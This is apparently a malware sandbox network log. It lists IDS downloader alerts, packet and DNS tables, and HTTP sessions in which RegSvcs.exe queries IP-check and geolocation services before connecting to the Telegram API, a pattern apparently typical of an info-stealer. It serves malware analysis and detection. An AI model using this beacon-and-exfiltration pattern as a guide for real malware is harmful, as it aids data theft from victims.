                                                                                                                                  2024-12-17T09:41:30.530148+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849709158.101.44.24280TCP
                                                                                                                                  2024-12-17T09:41:32.141927+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849710104.21.67.152443TCP
                                                                                                                                  2024-12-17T09:41:33.514607+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711158.101.44.24280TCP
                                                                                                                                  2024-12-17T09:41:38.351911+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849716104.21.67.152443TCP
                                                                                                                                  2024-12-17T09:41:44.336851+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849720104.21.67.152443TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 17, 2024 09:41:23.347832918 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:23.467504978 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:23.467890024 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:23.468189955 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:23.587882042 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:24.670916080 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:24.690713882 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:24.811306000 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:25.065179110 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:25.108284950 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:25.251673937 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:25.251704931 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:25.251854897 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:25.260519028 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:25.260530949 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:26.477339983 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:26.477411985 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:26.482804060 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:26.482810974 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:26.483172894 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:26.530133009 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:26.543282032 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:26.587340117 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.050420046 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.050489902 CET44349707104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.050616026 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:27.082355022 CET49707443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:27.093934059 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:27.213737965 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.467632055 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.470525026 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:27.470591068 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.470766068 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:27.471079111 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:27.471108913 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:27.514527082 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:28.691755056 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:28.694574118 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:28.694595098 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:29.137069941 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:29.137140036 CET44349708104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:29.137279034 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:29.137895107 CET49708443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:29.142052889 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:29.151230097 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:29.262527943 CET8049706158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:29.262656927 CET4970680192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:29.270977974 CET8049709158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:29.271080971 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:29.271258116 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:29.391092062 CET8049709158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:30.483529091 CET8049709158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:30.484865904 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:30.484896898 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:30.484957933 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:30.485738039 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:30.485747099 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:30.530148029 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:31.695952892 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:31.697946072 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:31.697977066 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:32.141942978 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:32.142009020 CET44349710104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:32.142050028 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:32.142642975 CET49710443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:32.146476984 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:32.147645950 CET4971180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:32.266427040 CET8049709158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:32.266549110 CET4970980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:32.267292023 CET8049711158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:32.267386913 CET4971180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:32.267570972 CET4971180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:32.387191057 CET8049711158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:33.471648932 CET8049711158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:33.473203897 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:33.473254919 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:33.473489046 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:33.473619938 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:33.473644972 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:33.514606953 CET4971180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:34.687482119 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:34.689183950 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:34.689210892 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:35.130321980 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:35.130400896 CET44349712104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:35.130490065 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:35.130985022 CET49712443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:35.135500908 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:35.255207062 CET8049714158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:35.255283117 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:35.255482912 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:35.375124931 CET8049714158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:36.461808920 CET8049714158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:36.463072062 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:36.463104963 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:36.463171959 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:36.463433981 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:36.463448048 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:36.514523983 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:37.673212051 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:37.674850941 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:37.674875975 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:38.351960897 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:38.352005959 CET44349716104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:38.352360010 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:38.352663994 CET49716443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:38.356004953 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:38.357125998 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:38.476097107 CET8049714158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:38.476191998 CET4971480192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:38.476778984 CET8049717158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:38.476929903 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:38.477087021 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:38.596746922 CET8049717158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:39.690244913 CET8049717158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:39.692323923 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:39.692380905 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:39.692451000 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:39.692857027 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:39.692871094 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:39.733300924 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:40.902565002 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:40.904202938 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:40.904237986 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:41.347091913 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:41.347258091 CET44349718104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:41.347342014 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:41.347881079 CET49718443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:41.351330042 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:41.352922916 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:41.471438885 CET8049717158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:41.471566916 CET4971780192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:41.472635031 CET8049719158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:41.472743988 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:41.472887993 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:41.592508078 CET8049719158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:42.676666975 CET8049719158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:42.678009987 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:42.678035975 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:42.678328037 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:42.678361893 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:42.678368092 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:42.717678070 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:43.892374992 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:43.894085884 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:43.894107103 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:44.336935997 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:44.337198019 CET44349720104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:44.337327957 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:44.337879896 CET49720443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:44.341116905 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:44.342169046 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:44.461189032 CET8049719158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:44.461318970 CET4971980192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:44.461985111 CET8049721158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:44.462063074 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:44.462203026 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:44.582001925 CET8049721158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:45.675975084 CET8049721158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:45.677520037 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:45.677573919 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:45.677673101 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:45.678142071 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:45.678154945 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:45.717701912 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:46.936577082 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:46.938599110 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:46.938627958 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:47.380875111 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:47.380949020 CET44349722104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:47.381000042 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:47.381560087 CET49722443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:47.384463072 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:47.385674000 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:47.504595041 CET8049721158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:47.504719973 CET4972180192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:47.505362988 CET8049723158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:47.505440950 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:47.505641937 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:47.625401974 CET8049723158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:48.710066080 CET8049723158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:48.711731911 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:48.711782932 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:48.711888075 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:48.712210894 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:48.712222099 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:48.764590979 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:49.922450066 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:49.924129009 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:49.924169064 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.379076004 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.379221916 CET44349724104.21.67.152192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.379338026 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:50.379774094 CET49724443192.168.2.8104.21.67.152
                                                                                                                                  Dec 17, 2024 09:41:50.430682898 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:50.550944090 CET8049723158.101.44.242192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.551026106 CET4972380192.168.2.8158.101.44.242
                                                                                                                                  Dec 17, 2024 09:41:50.571667910 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:50.571716070 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.571788073 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:50.572251081 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:50.572268009 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:51.940737963 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:51.940875053 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:51.943670034 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:51.943680048 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:51.943979979 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:51.945462942 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:51.987337112 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:52.450969934 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:52.451040983 CET44349725149.154.167.220192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:52.451114893 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:41:52.455687046 CET49725443192.168.2.8149.154.167.220
                                                                                                                                  Dec 17, 2024 09:42:06.917622089 CET4971180192.168.2.8158.101.44.242
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 17, 2024 09:41:23.202919960 CET5282853192.168.2.81.1.1.1
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET53528281.1.1.1192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:25.109612942 CET6189553192.168.2.81.1.1.1
                                                                                                                                  Dec 17, 2024 09:41:25.250757933 CET53618951.1.1.1192.168.2.8
                                                                                                                                  Dec 17, 2024 09:41:50.431282997 CET5915053192.168.2.81.1.1.1
                                                                                                                                  Dec 17, 2024 09:41:50.570579052 CET53591501.1.1.1192.168.2.8
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 17, 2024 09:41:23.202919960 CET192.168.2.81.1.1.10x7f51Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:25.109612942 CET192.168.2.81.1.1.10xab78Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:50.431282997 CET192.168.2.81.1.1.10xceeaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:23.340832949 CET1.1.1.1192.168.2.80x7f51No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:25.250757933 CET1.1.1.1192.168.2.80xab78No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:25.250757933 CET1.1.1.1192.168.2.80xab78No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                  Dec 17, 2024 09:41:50.570579052 CET1.1.1.1192.168.2.80xceeaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                  • api.telegram.org
                                                                                                                                  • checkip.dyndns.org
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.849706158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:23.468189955 CET151OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Dec 17, 2024 09:41:24.670916080 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:24 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 11966b0dabec349e156c14d0f0f593f5
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 17, 2024 09:41:24.690713882 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 09:41:25.065179110 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:24 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 7fabb89f61b0522b3e409e8637bdc2be
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                  Dec 17, 2024 09:41:27.093934059 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 09:41:27.467632055 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:27 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Request-ID: 005cfa9d927094e9d6f95b12943d7e18
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.849709158.101.44.242807960C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Dec 17, 2024 09:41:29.271258116 CET127OUTGET / HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                  Dec 17, 2024 09:41:30.483529091 CET321INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 17 Dec 2024 08:41:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 104
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Cache-Control: no-cache
